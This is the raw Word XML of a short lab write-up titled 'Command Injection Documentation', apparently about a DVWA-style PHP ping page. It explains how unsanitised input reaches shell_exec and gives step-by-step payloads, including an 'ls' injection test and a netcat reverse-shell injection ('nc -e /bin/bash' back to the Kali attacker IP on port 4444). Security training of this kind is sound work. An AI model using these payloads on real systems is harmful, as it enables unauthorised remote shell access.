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A79F" w14:textId="5FA48E29" w:rsidR="004F5D59" w:rsidRDefault="00F50635">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Comman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
      <w:r w:rsidR="0039125D">
        <w:t xml:space="preserve"> Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F964DE" w14:textId="1813A392" w:rsidR="00F50635" w:rsidRDefault="00F50635">
      <w:r>
        <w:t xml:space="preserve">This vulnerability is mostly because of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsanitised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user input. As I demonstrated in the screenshot, it accepts normal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then it directly puts it in the executing command (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F50635">
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F50635">
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F50635">
        <w:t>( 'ping  '</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F50635">
        <w:t xml:space="preserve"> . $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F50635">
        <w:t>target )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F50635">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>with out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> removing or cleaning the input. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC01A7" w14:textId="6E88D6BE" w:rsidR="00F50635" w:rsidRDefault="00F50635">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> threat actors all they </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do is pass </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a  second</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> argument they want to run, as the first argument is used for pinging. I used semicolon ‘;’ to add command but some one may use different syntax in fact the other security level won’t allow simple</w:t>
      </w:r>
      <w:r w:rsidR="0039125D">
        <w:t xml:space="preserve"> ‘;’ you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0039125D">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0039125D">
        <w:t xml:space="preserve"> use another way like &amp;, to run the second command in the background as it is not being </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0039125D">
        <w:t>filetered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0039125D">
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0039125D">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0039125D">
        <w:t xml:space="preserve"> code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606F1CF" w14:textId="4AD88FE4" w:rsidR="0039125D" w:rsidRDefault="0039125D" w:rsidP="0039125D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First put the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of kali attack machine = </w:t>
      </w:r>
      <w:r w:rsidRPr="0039125D">
        <w:t>192.168.106.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB83A12" w14:textId="25B21C65" w:rsidR="0039125D" w:rsidRDefault="0039125D" w:rsidP="0039125D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then test for command injection with ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls’</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0039125D">
        <w:t>192.168.106.130;ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D0685F0" w14:textId="543052DE" w:rsidR="0039125D" w:rsidRDefault="0039125D" w:rsidP="0039125D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lister in your machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C8902" w14:textId="77777777" w:rsidR="006B6FC4" w:rsidRDefault="0039125D" w:rsidP="0039125D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then run the payload in the input field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4FD83E" w14:textId="4E6F5D72" w:rsidR="0039125D" w:rsidRDefault="0039125D" w:rsidP="006B6FC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B6FC4" w:rsidRPr="006B6FC4">
        <w:t xml:space="preserve">192.168.106.130; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B6FC4" w:rsidRPr="006B6FC4">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B6FC4" w:rsidRPr="006B6FC4">
        <w:t xml:space="preserve"> -e /bin/bash 192.168.106.130 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B301596" w14:textId="014E9083" w:rsidR="006B6FC4" w:rsidRDefault="006B6FC4" w:rsidP="006B6FC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Boom, we are in.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006B6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2D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C16E1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F636C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8ED4E0BE"/>
    <w:lvl w:ilvl="0" w:tplc="31CE373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2020559">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="173500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35"/>
    <w:rsid w:val="0039125D"/>
    <w:rsid w:val="004F5D59"/>
    <w:rsid w:val="006A6876"/>
    <w:rsid w:val="006B6FC4"/>
    <w:rsid w:val="00AC75E6"/>
    <w:rsid w:val="00DB4FCA"/>
    <w:rsid w:val="00F5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1736"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A8622B91-064D-4599-B3E7-C1C34AC3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139</Words>
  <Characters>802</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>26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 TEBKEW</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>LIUL TEBKEW</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T13:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-28T13:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>